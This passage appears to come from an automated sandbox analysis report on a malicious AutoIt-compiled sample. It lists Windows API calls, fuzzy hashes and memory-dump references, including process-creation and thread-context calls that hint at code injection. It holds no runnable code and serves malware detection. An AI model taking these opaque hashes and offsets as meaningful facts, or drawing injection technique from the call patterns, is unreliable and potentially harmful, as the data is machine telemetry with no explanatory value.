                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
                                                • Instruction ID: 6349e2c1f7829ac0352a18ac60e74142055a2daec3e7fff74015cc1ae81553e9
                                                • Opcode Fuzzy Hash: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
                                                • Instruction Fuzzy Hash: 27D05B7550031467DB3097949D0DFC73F6CDB05750F0001927795D2091DAB09544CAD0
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005982F5
                                                • TerminateProcess.KERNEL32(00000000), ref: 005982FC
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 005984DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                • String ID:
                                                • API String ID: 146820519-0
                                                • Opcode ID: dd4315aae567811ed5560a780dfd1ee5064c2bf0e95d715c0aa77fe4b887cb1d
                                                • Instruction ID: 0d96c532a0a2ee81883e9a0173f347c5bb0cf8102b6e3803287d85da41dbf445
                                                • Opcode Fuzzy Hash: dd4315aae567811ed5560a780dfd1ee5064c2bf0e95d715c0aa77fe4b887cb1d
                                                • Instruction Fuzzy Hash: 80126B71A083019FDB14DF28C484B6ABBE5BF89318F04895DE8998B352DB31ED45CF92
                                                APIs
                                                  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
                                                  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
                                                  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
                                                  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
                                                  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
                                                  • Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22
                                                  • Part of subcall function 00511B4A: RegisterWindowMessageW.USER32(00000004,?,005112C4), ref: 00511BA2
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051136A
                                                • OleInitialize.OLE32 ref: 00511388
                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 005524AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 1986988660-0
                                                • Opcode ID: d9f1934d5bc0c945d4157bae68404e77a2955491e444033d96acdde581ce522f
                                                • Instruction ID: a2c1be7d9bad3e72d67d319451dd2cef8a1051d32bf9687fd9b9a2537118ac49
                                                • Opcode Fuzzy Hash: d9f1934d5bc0c945d4157bae68404e77a2955491e444033d96acdde581ce522f
                                                • Instruction Fuzzy Hash: 8F71C1B5905B818ED78CDF79A9C56993EE0FBA9340744416BD08ACF3A1EB304488EF4D
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0051556D
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0051557D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 904ca61be81e179ea195a04260c9b747046fa10971a7ba17e58dde1f693d486d
                                                • Instruction ID: 18eadea4bd4513311671ac9f05911c2f2bd0d3b93e2ac4ee35a48215d1b7c78f
                                                • Opcode Fuzzy Hash: 904ca61be81e179ea195a04260c9b747046fa10971a7ba17e58dde1f693d486d
                                                • Instruction Fuzzy Hash: 1F315071A00609FFEB14CF28C880BD9BBB6FB84354F15862AE91997240E775FD94CB90
                                                APIs
                                                  • Part of subcall function 00513923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0057C259
                                                • KillTimer.USER32(?,00000001,?,?), ref: 0057C261
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0057C270
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer$Kill
                                                • String ID:
                                                • API String ID: 3500052701-0
                                                • Opcode ID: 84e430f0ea7d7c3f3f44777c474e6665588b1047e38d15e98f6fc299fc65fdcc
                                                • Instruction ID: 8268c38520dea522e2ad6d0c6ea99744c00fa1bb3e7c6e7c4814fcfdb04259e6
                                                • Opcode Fuzzy Hash: 84e430f0ea7d7c3f3f44777c474e6665588b1047e38d15e98f6fc299fc65fdcc
                                                • Instruction Fuzzy Hash: 9C31C574904744AFEB22CF64A895BEBBFECAB17304F00449DD2DE97242C7745A88DB51
                                                APIs
                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,005485CC,?,005D8CC8,0000000C), ref: 00548704
                                                • GetLastError.KERNEL32(?,005485CC,?,005D8CC8,0000000C), ref: 0054870E
                                                • __dosmaperr.LIBCMT ref: 00548739
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID:
                                                • API String ID: 2583163307-0
                                                • Opcode ID: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
                                                • Instruction ID: ca96c30c1691fcba0cd7422c8e6215f49d8d2d32e340fa7d64285d3245ada209
                                                • Opcode Fuzzy Hash: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
                                                • Instruction Fuzzy Hash: E0018E33A0426027D6A56B346889BFE2F59BBE277CF3A0519F8148B1D3EEB1CC819150
                                                APIs
                                                • TranslateMessage.USER32(?), ref: 0051DB7B
                                                • DispatchMessageW.USER32(?), ref: 0051DB89
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
                                                • Sleep.KERNEL32(0000000A), ref: 0051DBB1
                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00561CC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                • String ID:
                                                • API String ID: 3288985973-0
                                                • Opcode ID: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
                                                • Instruction ID: b04c57b5133ee7231b73540fc7dc41ed18e125d81c195027c2f3adf0a976cd47
                                                • Opcode Fuzzy Hash: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
                                                • Instruction Fuzzy Hash: DBF05E306483809BFB34CB608C89FEA7BBCFB95310F104918E64A830C0DB30A488DB29
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00582CD4,?,?,?,00000004,00000001), ref: 00582FF2
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00583006
                                                • CloseHandle.KERNEL32(00000000,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0058300D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
                                                • Instruction ID: ace23b7b4834e6e9de36bc86a17b135bfa3756152a7ac01cfc0a3ac53ca464b7
                                                • Opcode Fuzzy Hash: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
                                                • Instruction Fuzzy Hash: 14E0863238021077D7312755BC0DF8B3E1CD787F71F104211FB19750D08AA0550593A8
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 005217F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CALL
                                                • API String ID: 1385522511-4196123274
                                                • Opcode ID: 48f97d61006adb61e383fb552b95c4ef56480cf853b633563e3456a644739caf
                                                • Instruction ID: 6634c6f1f2c92b9a7d328588e81a4e2057efe7602474ce4a2ff8a8cee2b1219c
                                                • Opcode Fuzzy Hash: 48f97d61006adb61e383fb552b95c4ef56480cf853b633563e3456a644739caf
                                                • Instruction Fuzzy Hash: 9422AB706086529FC714DF14E484A2BBFF1BFA6314F18896DF4868B3A2D731E845CB86
                                                APIs
                                                • _wcslen.LIBCMT ref: 00586F6B
                                                  • Part of subcall function 00514ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LibraryLoad_wcslen
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3312870042-2806939583
                                                • Opcode ID: 03282ece5115e28fffd96dbae5b03d6564a9532dabe093ce27b53afb65753ca4
                                                • Instruction ID: 741b6fd0abcc939fdf08f7ab529197b2810baf9b9adafbbfbf9ac3598e5f8555
                                                • Opcode Fuzzy Hash: 03282ece5115e28fffd96dbae5b03d6564a9532dabe093ce27b53afb65753ca4
                                                • Instruction Fuzzy Hash: 44B174312082069FDB14FF24C4959AEBBE5BFD8310F14495DF89697261EB30ED85CB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID: EA06
                                                • API String ID: 2638373210-3962188686
                                                • Opcode ID: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
                                                • Instruction ID: 89241343d2bcf0af205bc30084046dbc01c5d46a47e02f79d006108566054ae9
                                                • Opcode Fuzzy Hash: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
                                                • Instruction Fuzzy Hash: 8301B5729442587EDF28D7A8C85AFAEBFF8AB05301F00455AE592E61C1E5B4E608CB60
                                                APIs
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00513908
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_
                                                • String ID:
                                                • API String ID: 1144537725-0
                                                • Opcode ID: 733028056f64d79adee4306f92ca461db6d2bdca87065f33659f66aaa9822bdc
                                                • Instruction ID: a3104f05ad26b2e79550cb6a0e322f9f8e9617fb0eba3216efbd6ecfaa37af3a
                                                • Opcode Fuzzy Hash: 733028056f64d79adee4306f92ca461db6d2bdca87065f33659f66aaa9822bdc
                                                • Instruction Fuzzy Hash: 3D319C705057019FE720DF24D8947DBBFE8FB59708F00092EF99997240E771AA88DB56
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0051949C,?,00008000), ref: 00515773
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0051949C,?,00008000), ref: 00554052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 8b83e2ed181122a1d26f69c35de5e8ea26ebf3c857524b77e3fe5658ce679d8f
                                                • Instruction ID: c49e2ef438f33b9c7c91c7516e55e77608b4c4235832cb6192be4ae7e10392b1
                                                • Opcode Fuzzy Hash: 8b83e2ed181122a1d26f69c35de5e8ea26ebf3c857524b77e3fe5658ce679d8f
                                                • Instruction Fuzzy Hash: 77018030245625F6E3315A2ACC0EF977F98EF427B4F108201BA9C5A1E0DBB45894CB90
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00519879,?,?,?), ref: 00516E33
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00519879,?,?,?), ref: 00516E69
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 626452242-0
                                                • Opcode ID: 147c678ec246ddf19d625abb77ff8b3e6c7041d232f82d841dec64bc4c006250
                                                • Instruction ID: d5611b9ff13c6b2225f552cac1b14a2417238e58bb979251925ffc26fbc54f49
                                                • Opcode Fuzzy Hash: 147c678ec246ddf19d625abb77ff8b3e6c7041d232f82d841dec64bc4c006250
                                                • Instruction Fuzzy Hash: 6C01B1713012017FEB19A779AC0AFBF7EADEF85300F14013DB106DA1E1E960AC009620
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 016024DB
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01602571
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01602593
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                • Instruction ID: af62ac92451ce3bb0e8534dedb036913d19e77db87e98a0c4c22015fb9dd633a
                                                • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                • Instruction Fuzzy Hash: 7912CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 99abc67ec20f9200d5920452b717e39ac1dbb84cd81301deb06dfaf919a41a39
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: C631DF74A041199BD718CF59F490969FBB2FF4A300B2486B5E80ADB696D731EDC1CBD0
                                                APIs
                                                  • Part of subcall function 00514E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
                                                  • Part of subcall function 00514E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
                                                  • Part of subcall function 00514E90: FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD
                                                  • Part of subcall function 00514E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
                                                  • Part of subcall function 00514E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
                                                  • Part of subcall function 00514E59: FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressFreeProc
                                                • String ID:
                                                • API String ID: 2632591731-0
                                                • Opcode ID: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
                                                • Instruction ID: 48b0312ac32c550c80d4d31d0f05ca6639ee46fab9d83a75a2a14cdf16941df8
                                                • Opcode Fuzzy Hash: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
                                                • Instruction Fuzzy Hash: 7111C431600206AAEF15AB60D81AFED7FA5BFC0711F10442AF542AA2D1EE719E85DB50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: __wsopen_s
                                                • String ID:
                                                • API String ID: 3347428461-0
                                                • Opcode ID: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
                                                • Instruction ID: 618b61f8fe42da43e59964d0c08dde0c02aa4591aef5de213732375e3dde6d57
                                                • Opcode Fuzzy Hash: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
                                                • Instruction Fuzzy Hash: 5311257590410AAFCF09DF58E9449EE7BF8FF48308F144059F808AB352DA30DA118BA4
                                                APIs
